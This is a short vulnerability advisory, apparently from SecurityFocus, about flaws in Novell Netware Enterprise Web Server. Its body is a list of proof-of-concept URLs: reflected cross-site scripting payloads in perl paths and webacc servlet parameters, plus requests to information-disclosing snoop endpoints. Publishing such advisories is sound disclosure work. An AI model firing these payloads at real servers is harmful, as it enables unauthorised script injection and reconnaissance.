Novell Netware Enterprise Web Server Multiple Vulnerabilities

No exploit is required.

The following proof of concept examples have been provided:
http://www.example.com/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
http://www.example.com/perl/<script>alert('XSS')</script>.pl
http://www.example.com/perl/\/.pl
http://www.example.com/servlet/webacc?User.id="><script>alert('XSS')</script>
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>
http://www.example.com/examples/jsp/snp/snoop.jsp
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=<htt file>
http://www.example.com/servlet/SnoopServlet
http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas


 

Privacy Statement
Copyright 2010, SecurityFocus